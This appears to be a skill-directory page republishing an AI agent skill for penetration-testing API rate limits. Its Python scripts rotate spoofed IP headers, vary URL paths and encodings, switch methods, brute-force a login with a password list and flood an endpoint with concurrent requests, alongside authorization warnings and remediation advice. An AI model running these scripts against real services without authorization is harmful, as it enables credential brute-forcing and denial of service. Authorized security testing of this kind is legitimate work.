Agent skill

Performing API Rate Limiting Bypass

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Tests API rate limiting for bypass vulnerabilities using Python (requests/aiohttp) and Burp Suite Turbo Intruder to manipulate headers (e.g.

Apache-2.0Auto-check passedBackend & APIs

Install Performing API Rate Limiting Bypass

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-api-rate-limiting-bypass -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills performing-api-rate-limiting-bypass --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/performing-api-rate-limiting-bypass .claude/skills/performing-api-rate-limiting-bypass && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
performing-api-rate-limiting-bypass
GitHub stars
34k
Token cost
~4.4k tokens
SKILL.md length
631 words
Files
4 (incl. scripts, references)
Skills in repo
644
Repo updated
First seen
Licence
Apache-2.0

At a glance

Tests API rate limiting for bypass vulnerabilities using Python (requests/aiohttp) and Burp Suite Turbo Intruder to manipulate headers (e.g.

  • Works in 6 steps: Rate Limit Discovery and Baseline → IP-Based Bypass Techniques → Endpoint Variation Bypass → …
  • Under written authorization
  • SKILL.md covers When to Use, Prerequisites, Workflow and Key Concepts, plus 3 more sections
  • Runs Python scripts from its folder

What it does

Performing API Rate Limiting Bypass is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Tests API rate limiting for bypass vulnerabilities using Python (requests/aiohttp) and Burp Suite Turbo Intruder to manipulate headers (e.g. X-Forwarded-For spoofing), IPs, HTTP methods, API versions, and encodings, mapping findings to OWASP API4:2023 Unrestricted Resource Consumption. Use when assessing, under written authorization, whether rate limits can be bypassed to enable brute force or resource-exhaustion attacks.

Its SKILL.md is about 4.4k tokens, which your agent loads only when the skill is triggered. The skill folder holds 5 other files, including scripts and reference files (for example `references/api-reference.md` and `scripts/agent.py`).

It sits in Backend & APIs, covering Rate limiting. It works with Burp Suite and Python. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • Under written authorization
  • Whether rate limits can be bypassed to enable brute force
  • Resource-exhaustion attacks

Example prompts

  • “Use the performing-api-rate-limiting-bypass skill to test API rate limiting for bypass vulnerabilities using Python (requests/aiohttp) and Burp…”
  • “/performing-api-rate-limiting-bypass”

Requirements

  • Python 3

Workflow steps

6 steps, taken from the step headings in SKILL.md.

  1. Rate Limit Discovery and Baseline
  2. IP-Based Bypass Techniques
  3. Endpoint Variation Bypass
  4. HTTP Method and Content-Type Bypass
  5. Account-Level Bypass Techniques
  6. Distributed and Async Testing

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 1 file in scripts/ (Python), which the agent can run.

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Performing API Rate Limiting Bypass loads about 4.4k tokens when it runs, and up to ~5k if it reads all its reference files. Until then it costs about 115 tokens; SKILL.md has 631 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~115
When it runs · the whole SKILL.md, loaded when a task matches
~4.4k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~5k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 631 words, ~4,413 tokens.

Download SKILL.mdSave it as .claude/skills/performing-api-rate-limiting-bypass/SKILL.md (or your agent's skills folder). This skill also uses 3 other files; get the full folder from GitHub.
name
performing-api-rate-limiting-bypass
description
Tests API rate limiting for bypass vulnerabilities using Python (requests/aiohttp) and Burp Suite Turbo Intruder to manipulate headers (e.g. X-Forwarded-For spoofing), IPs, HTTP methods, API versions, and encodings, mapping findings to OWASP API4:2023 Unrestricted Resource Consumption. Use when assessing, under written authorization, whether rate limits can be bypassed to enable brute force or resource-exhaustion attacks.
domain
cybersecurity
subdomain
api-security
tags
api-security, owasp, rate-limiting, throttling, brute-force, dos-prevention
version
1.0.0
author
mahipal
license
Apache-2.0
nist_csf
PR.PS-01, ID.RA-01, PR.DS-10, DE.CM-01
mitre_attack
T1190, T1059.007, T1552.001, T1027, T1055

Performing API Rate Limiting Bypass

When to Use

  • Testing whether API rate limiting can be circumvented to enable brute force attacks on authentication endpoints
  • Assessing the effectiveness of API throttling controls against credential stuffing or account enumeration
  • Evaluating if rate limits are enforced consistently across all API versions, methods, and encoding formats
  • Testing if API gateway rate limiting can be bypassed through header manipulation or IP rotation
  • Validating that rate limits protect against resource exhaustion and denial-of-service conditions

Do not use without written authorization. Rate limit testing involves sending high volumes of requests that may impact service availability.

Prerequisites

  • Written authorization specifying target endpoints and acceptable request volumes
  • Python 3.10+ with requests, aiohttp, and asyncio libraries
  • Burp Suite Professional with Turbo Intruder extension for high-speed testing
  • cURL for manual header manipulation testing
  • Knowledge of the target's CDN and WAF infrastructure (Cloudflare, AWS WAF, Akamai)
  • List of rate-limit bypass headers to test

Workflow

Step 1: Rate Limit Discovery and Baseline

Identify how rate limiting is implemented:

python
import requests
import time

BASE_URL = "https://target-api.example.com/api/v1"
headers = {"Authorization": "Bearer <token>", "Content-Type": "application/json"}

# Send requests and track rate limit headers
def probe_rate_limit(endpoint, method="GET", count=100):
    results = []
    for i in range(count):
        resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=headers)
        rate_headers = {
            "limit": resp.headers.get("X-RateLimit-Limit") or resp.headers.get("X-Rate-Limit-Limit"),
            "remaining": resp.headers.get("X-RateLimit-Remaining") or resp.headers.get("X-Rate-Limit-Remaining"),
            "reset": resp.headers.get("X-RateLimit-Reset") or resp.headers.get("X-Rate-Limit-Reset"),
            "retry_after": resp.headers.get("Retry-After"),
            "status": resp.status_code
        }
        results.append(rate_headers)
        if resp.status_code == 429:
            print(f"Rate limited at request {i+1}: {rate_headers}")
            return results, i+1
        time.sleep(0.05)  # Small delay to avoid connection issues
    print(f"No rate limit triggered after {count} requests")
    return results, count

# Test key endpoints
login_results, login_threshold = probe_rate_limit("/auth/login", "POST", 200)
api_results, api_threshold = probe_rate_limit("/users/me", "GET", 200)
search_results, search_threshold = probe_rate_limit("/search?q=test", "GET", 200)

print(f"\nRate Limit Summary:")
print(f"  Login: Triggered at request {login_threshold}")
print(f"  API: Triggered at request {api_threshold}")
print(f"  Search: Triggered at request {search_threshold}")
Step 2: IP-Based Bypass Techniques
python
# Bypass Technique 1: Header-based IP spoofing
IP_SPOOFING_HEADERS = [
    "X-Forwarded-For",
    "X-Real-IP",
    "X-Original-Forwarded-For",
    "X-Originating-IP",
    "X-Remote-IP",
    "X-Remote-Addr",
    "X-Client-IP",
    "X-Host",
    "X-Forwarded-Host",
    "True-Client-IP",
    "Cluster-Client-IP",
    "X-ProxyUser-Ip",
    "Forwarded",
    "CF-Connecting-IP",
    "Fastly-Client-IP",
    "X-Azure-ClientIP",
    "X-Akamai-Client-IP",
]

def test_ip_spoofing_bypass(endpoint, method="POST", body=None):
    """Test if IP spoofing headers bypass rate limiting."""
    # First, trigger the rate limit normally
    for i in range(200):
        resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=headers, json=body)
        if resp.status_code == 429:
            print(f"Rate limit triggered at request {i+1}")
            break

    # Now test each spoofing header
    bypasses_found = []
    for header in IP_SPOOFING_HEADERS:
        spoofed_headers = {**headers, header: f"10.0.{i%256}.{(i*7)%256}"}
        resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=spoofed_headers, json=body)
        if resp.status_code != 429:
            bypasses_found.append(header)
            print(f"[BYPASS] {header} -> {resp.status_code}")

    return bypasses_found

login_body = {"username": "test@example.com", "password": "wrongpassword"}
bypasses = test_ip_spoofing_bypass("/auth/login", "POST", login_body)
Step 3: Endpoint Variation Bypass
python
# Bypass Technique 2: URL path variation
def test_path_variation_bypass(base_endpoint, token):
    """Test if path variations bypass rate limit tied to specific endpoint."""
    variations = [
        base_endpoint,                          # /api/v1/auth/login
        base_endpoint + "/",                    # /api/v1/auth/login/
        base_endpoint.upper(),                  # /API/V1/AUTH/LOGIN
        base_endpoint + "?dummy=1",             # /api/v1/auth/login?dummy=1
        base_endpoint + "#fragment",            # /api/v1/auth/login#fragment
        base_endpoint + "%20",                  # /api/v1/auth/login%20
        base_endpoint + "/..",                  # /api/v1/auth/login/..
        base_endpoint.replace("/v1/", "/v2/"),  # /api/v2/auth/login
        base_endpoint + ";",                    # /api/v1/auth/login;
        base_endpoint + "\t",                   # Tab character
        base_endpoint + "%00",                  # Null byte
        base_endpoint + "..;/",                 # Spring path traversal
    ]

    # Trigger rate limit on original endpoint first
    for i in range(200):
        resp = requests.post(f"{BASE_URL}{base_endpoint}",
                           headers={"Authorization": f"Bearer {token}"},
                           json={"username": "test", "password": "wrong"})
        if resp.status_code == 429:
            break

    # Test variations
    for variant in variations:
        try:
            resp = requests.post(f"{BASE_URL}{variant}",
                               headers={"Authorization": f"Bearer {token}"},
                               json={"username": "test", "password": "wrong"})
            if resp.status_code != 429:
                print(f"[BYPASS] Path variation: {variant} -> {resp.status_code}")
        except Exception:
            pass

test_path_variation_bypass("/auth/login", "<token>")
Step 4: HTTP Method and Content-Type Bypass
python
# Bypass Technique 3: Method and content-type switching
def test_method_bypass(endpoint, original_body):
    """Test if rate limit is method-specific."""
    methods_to_test = ["POST", "PUT", "PATCH", "GET", "OPTIONS"]

    content_types = [
        "application/json",
        "application/x-www-form-urlencoded",
        "multipart/form-data",
        "text/plain",
        "application/xml",
        "text/xml",
    ]

    # Trigger rate limit with POST + application/json
    for i in range(200):
        resp = requests.post(f"{BASE_URL}{endpoint}",
                           headers={**headers, "Content-Type": "application/json"},
                           json=original_body)
        if resp.status_code == 429:
            break

    # Test other methods
    for method in methods_to_test:
        if method == "POST":
            continue
        resp = requests.request(method, f"{BASE_URL}{endpoint}",
                              headers=headers, json=original_body)
        if resp.status_code not in (429, 405):
            print(f"[BYPASS] Method switch to {method}: {resp.status_code}")

    # Test other content types
    for ct in content_types:
        if ct == "application/json":
            continue
        test_headers = {**headers, "Content-Type": ct}
        if ct == "application/x-www-form-urlencoded":
            data = "&".join(f"{k}={v}" for k, v in original_body.items())
            resp = requests.post(f"{BASE_URL}{endpoint}", headers=test_headers, data=data)
        else:
            resp = requests.post(f"{BASE_URL}{endpoint}", headers=test_headers,
                               data=str(original_body))
        if resp.status_code != 429:
            print(f"[BYPASS] Content-Type {ct}: {resp.status_code}")

test_method_bypass("/auth/login", {"username": "test@example.com", "password": "wrong"})
Step 5: Account-Level Bypass Techniques
python
# Bypass Technique 4: Rotate identifiers to avoid per-account limits
import string
import random

def test_account_rotation_bypass(login_endpoint, target_password_list):
    """Test if rate limit is per-account, bypassed by rotating usernames."""
    target_email = "victim@example.com"

    # Test 1: Per-account rate limit bypass by rotating the username field
    # with slight variations
    email_variations = [
        target_email,
        target_email.upper(),
        f" {target_email}",
        f"{target_email} ",
        target_email.replace("@", "%40"),
        f"+tag@".join(target_email.split("@")),  # victim+tag@example.com
    ]

    for password in target_password_list[:50]:
        for email_var in email_variations:
            resp = requests.post(f"{BASE_URL}{login_endpoint}",
                               json={"username": email_var, "password": password})
            if resp.status_code == 200:
                print(f"[SUCCESS] Logged in with: {email_var} / {password}")
                return True
            elif resp.status_code == 429:
                print(f"Rate limited on variation: {email_var}")
            # Small delay
            time.sleep(0.1)

    return False

# Bypass Technique 5: Parameter pollution
def test_parameter_pollution_bypass(endpoint):
    """Add extra parameters to make each request appear unique."""
    for i in range(200):
        random_param = ''.join(random.choices(string.ascii_lowercase, k=8))
        resp = requests.post(
            f"{BASE_URL}{endpoint}?{random_param}={i}",
            headers=headers,
            json={"username": "test@example.com", "password": f"attempt_{i}"}
        )
        if resp.status_code == 429:
            print(f"Parameter pollution failed at request {i+1}")
            return False
    print("[BYPASS] Parameter pollution: 200 requests without rate limit")
    return True
Step 6: Distributed and Async Testing
python
import asyncio
import aiohttp

async def distributed_rate_limit_test(endpoint, total_requests=1000, concurrency=50):
    """Test rate limiting under concurrent load."""
    results = {"success": 0, "rate_limited": 0, "errors": 0}

    async def make_request(session, request_num):
        try:
            # Rotate X-Forwarded-For per request
            req_headers = {
                **headers,
                "X-Forwarded-For": f"192.168.{request_num % 256}.{(request_num * 3) % 256}"
            }
            async with session.post(
                f"{BASE_URL}{endpoint}",
                headers=req_headers,
                json={"username": "test@example.com", "password": f"attempt_{request_num}"}
            ) as resp:
                if resp.status == 429:
                    results["rate_limited"] += 1
                elif resp.status in (200, 401):
                    results["success"] += 1
                else:
                    results["errors"] += 1
        except Exception:
            results["errors"] += 1

    connector = aiohttp.TCPConnector(limit=concurrency)
    async with aiohttp.ClientSession(connector=connector) as session:
        tasks = [make_request(session, i) for i in range(total_requests)]
        await asyncio.gather(*tasks)

    print(f"\nDistributed Test Results:")
    print(f"  Successful: {results['success']}")
    print(f"  Rate Limited: {results['rate_limited']}")
    print(f"  Errors: {results['errors']}")
    print(f"  Bypass Rate: {results['success']/(results['success']+results['rate_limited'])*100:.1f}%")

# asyncio.run(distributed_rate_limit_test("/auth/login"))

Key Concepts

TermDefinition
Rate LimitingControlling the number of requests a client can make to an API within a time window, typically enforced per IP, per user, or per API key
Unrestricted Resource ConsumptionOWASP API4:2023 - APIs that do not properly limit the size or number of resources requested, enabling DoS or brute force attacks
X-Forwarded-For SpoofingManipulating the X-Forwarded-For header to make the server believe requests originate from different IP addresses, bypassing IP-based rate limits
Credential StuffingAutomated injection of stolen username/password pairs against login endpoints, requiring rate limit bypass for large-scale attacks
Token BucketRate limiting algorithm that allows bursts of requests up to a bucket size, refilling at a constant rate
Sliding WindowRate limiting algorithm that tracks requests in a rolling time window, more resistant to burst attacks than fixed windows

Tools & Systems

  • Burp Suite Turbo Intruder: High-performance request sender for rate limit testing using Python-based scripting engine
  • ffuf: Fast web fuzzer capable of testing rate limits with configurable request rates and header manipulation
  • wfuzz: Web fuzzer with support for header injection, parameter fuzzing, and rate limit evasion techniques
  • Postman Collection Runner: Automated collection execution with variable rotation for rate limit bypass testing
  • Gatling/k6: Load testing tools that simulate realistic traffic patterns to test rate limiting under production-like conditions
Show full SKILL.md (224 more words)Show less

Common Scenarios

Scenario: Login API Rate Limit Bypass Assessment

Context: A financial services API implements rate limiting on the login endpoint to prevent brute force attacks. The security team wants to verify the effectiveness of these controls before a compliance audit.

Approach:

  1. Baseline: Send 100 requests to POST /api/v1/auth/login - rate limited at request 10 per minute per IP
  2. Test X-Forwarded-For rotation: Send 100 requests with unique X-Forwarded-For values - rate limit bypassed (all requests return 401, not 429)
  3. Test path variation: /api/v1/auth/login/ (trailing slash) resets the rate limit counter
  4. Test API versioning: /api/v2/auth/login has no rate limiting configured (shadow API)
  5. Test parameter pollution: Adding ?_=<random> to each request bypasses the rate limit
  6. Test concurrent requests: 50 simultaneous requests from same IP - 45 succeed before rate limit kicks in (race condition in counter)
  7. Determine that rate limiting is implemented at the nginx reverse proxy level using IP-only tracking, trusting X-Forwarded-For header without validation

Pitfalls:

  • Sending too many requests too fast and causing actual denial of service to the test environment
  • Not testing rate limits on password reset, MFA verification, and account enumeration endpoints
  • Assuming the rate limit applies globally when it may be per-endpoint or per-method only
  • Missing race conditions in rate limit counters that allow burst bypasses
  • Not testing both authenticated and unauthenticated rate limiting separately

Output Format

## Finding: Rate Limiting Bypass via X-Forwarded-For Header Spoofing

**ID**: API-RATE-001
**Severity**: High (CVSS 7.3)
**OWASP API**: API4:2023 - Unrestricted Resource Consumption
**Affected Endpoints**:
  - POST /api/v1/auth/login
  - POST /api/v1/auth/forgot-password
  - POST /api/v1/auth/verify-mfa

**Description**:
The API rate limiting implementation relies on the X-Forwarded-For header
to identify client IP addresses. Since the application sits behind a load
balancer that does not strip or validate this header, an attacker can set
arbitrary X-Forwarded-For values to bypass the 10 requests/minute rate limit
on authentication endpoints.

**Bypass Methods Confirmed**:
1. X-Forwarded-For rotation: 1000 login attempts in 60 seconds (vs 10 limit)
2. Trailing slash path variation: /auth/login/ treated as separate endpoint
3. API v2 endpoint: No rate limiting configured
4. Race condition: 50 concurrent requests, 45 succeed before counter updates

**Impact**:
An attacker can perform unlimited brute force attacks against any user
account, bypassing the rate limit designed to prevent credential stuffing.
At 1000 attempts per minute, a 6-digit PIN can be brute-forced in under
17 minutes.

**Remediation**:
1. Configure the load balancer to set X-Forwarded-For and strip client-provided values
2. Implement rate limiting at the application layer using authenticated user ID, not just IP
3. Normalize URL paths before applying rate limit rules (strip trailing slashes, enforce lowercase)
4. Apply rate limits consistently across all API versions and content types
5. Use atomic rate limit counters (Redis INCR) to prevent race conditions
6. Implement progressive delays (exponential backoff) in addition to hard limits

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 3 other files (scripts, references) in skills/performing-api-rate-limiting-bypass of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • references/api-reference.md
  • scripts/agent.py

Open the folder on GitHubat commit 54a7988

Compare with similar skills

Performing API Rate Limiting Bypass next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Performing API Rate Limiting Bypass compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Performing API Rate Limiting Bypass this skillmukul975/Anthropic-Cybersecurity-Skills34k—~4.4kAutomated safety check: PassApache-2.0
Bfl APIblack-forest-labs/skills1271 repos~2.5kAutomated safety check: NotesMIT
Routing Outbound API CallsPostHog/posthog40k—~2.7kAutomated safety check: PassCustom licence
Frappe Impl WhitelistedImpertio-Studio/Frappe_Claude_Skill_Package188—~3.1kAutomated safety check: PassMIT
Oraclecloud Rate Limitsjeremylongshore/tons-of-skills-marketplace2.8k—~2.6kAutomated safety check: PassMIT
Python Web App Security Auditaiskillstore/marketplace430—~1.2kAutomated safety check: NotesMIT

Similar skills

  • Bfl API

    black-forest-labs/skills

    BFL FLUX API integration guide covering endpoints, async polling patterns, rate limiting, error handling, webhooks, and regional endpoints with Python and TypeScript code examples.

    127 GitHub starsUsed in 1 repo~2.5k tokens
    Backend & APIsAuto-check: notes
  • Official

    Use before adding or changing Python code that calls a third-party HTTP API from PostHog (a vendor REST call, a vendor SDK client, a scraping or enrichment service), and before adding or changing a…

    40k GitHub stars~2.7k tokensUpdated today
    Backend & APIsAuto-check passed
  • Frappe Impl Whitelisted

    Impertio-Studio/Frappe_Claude_Skill_Package

    A skill your agent uses when building API endpoints with @frappe.whitelist() in Frappe.

    188 GitHub stars~3.1k tokensUpdated 22 days ago
    Backend & APIsAuto-check passed
  • Oraclecloud Rate Limits

    jeremylongshore/tons-of-skills-marketplace

    Handle OCI API rate limits with defensive retry patterns and known limits by service.

    2.8k GitHub stars~2.6k tokensUpdated today
    Backend & APIsAuto-check passed
  • Python Web App Security Audit

    aiskillstore/marketplace

    Run defensive pre-release security tests for Python web applications.

    430 GitHub stars~1.2k tokensUpdated today
    Backend & APIsAuto-check: notes
  • Proxy6

    VKirill/claude-lane-stack

    [RU: интеграция proxy6.net — покупка/продление прокси, пул, ipauth, scraping] proxy6.net REST API — RU proxy provider for IPv4/IPv4 Shared/IPv6/MTproto.

    122 GitHub stars~3.6k tokensUpdated today
    Backend & APIsAuto-check passed

More from mukul975/Anthropic-Cybersecurity-Skills

All 644 skills in this repo
  • Campaign Attribution Evidence Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    Auto-check passed
  • Go Malware Analysis in Ghidra

    mukul975/Anthropic-Cybersecurity-Skills

    Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • LNK and Jump List Forensics

    mukul975/Anthropic-Cybersecurity-Skills

    Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Malware Persistence Analysis with Autoruns

    mukul975/Anthropic-Cybersecurity-Skills

    Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.

    34k GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • NTFS MFT Deleted File Recovery

    mukul975/Anthropic-Cybersecurity-Skills

    Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    Auto-check passed
  • Network Covert Channel Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Categories

Questions about Performing API Rate Limiting Bypass

What does Performing API Rate Limiting Bypass do?

Tests API rate limiting for bypass vulnerabilities using Python (requests/aiohttp) and Burp Suite Turbo Intruder to manipulate headers (e.g. Performing API Rate Limiting Bypass is an agent skill from mukul975/Anthropic-Cybersecurity-Skills.g.

When should I use Performing API Rate Limiting Bypass?

Performing API Rate Limiting Bypass fits situations like: under written authorization; whether rate limits can be bypassed to enable brute force; resource-exhaustion attacks.

How do I install Performing API Rate Limiting Bypass in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-api-rate-limiting-bypass -a claude-code`. Or copy the skill folder (skills/performing-api-rate-limiting-bypass in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/performing-api-rate-limiting-bypass in your project. Claude Code loads it when a task matches its description.

How do I install Performing API Rate Limiting Bypass in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-api-rate-limiting-bypass -a codex`. Or copy the skill folder (skills/performing-api-rate-limiting-bypass in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/performing-api-rate-limiting-bypass in your project. Codex loads it when a task matches its description.

Can I use Performing API Rate Limiting Bypass in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-api-rate-limiting-bypass -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/performing-api-rate-limiting-bypass, .gemini/skills/performing-api-rate-limiting-bypass, .github/skills/performing-api-rate-limiting-bypass and .opencode/skills/performing-api-rate-limiting-bypass in your project.

What does Performing API Rate Limiting Bypass need to run?

Going by SKILL.md and its folder, Performing API Rate Limiting Bypass needs Python for the scripts in its folder. Our summary lists: Python 3.

Does Performing API Rate Limiting Bypass access the network?

SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.

Is Performing API Rate Limiting Bypass safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Performing API Rate Limiting Bypass use?

Performing API Rate Limiting Bypass is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Performing API Rate Limiting Bypass use?

About 4.4k tokens (SKILL.md is roughly 18k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 553 tokens, read only when the agent opens those files.

What are the alternatives to Performing API Rate Limiting Bypass?

Skills that share tags, products or a category with Performing API Rate Limiting Bypass: Bfl API (black-forest-labs/skills, 127 stars), Routing Outbound API Calls (PostHog/posthog, 40k stars), Frappe Impl Whitelisted (Impertio-Studio/Frappe_Claude_Skill_Package, 188 stars) and Oraclecloud Rate Limits (jeremylongshore/tons-of-skills-marketplace, 2.8k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Performing API Rate Limiting Bypass?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 33,993 GitHub stars. The repository holds 644 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.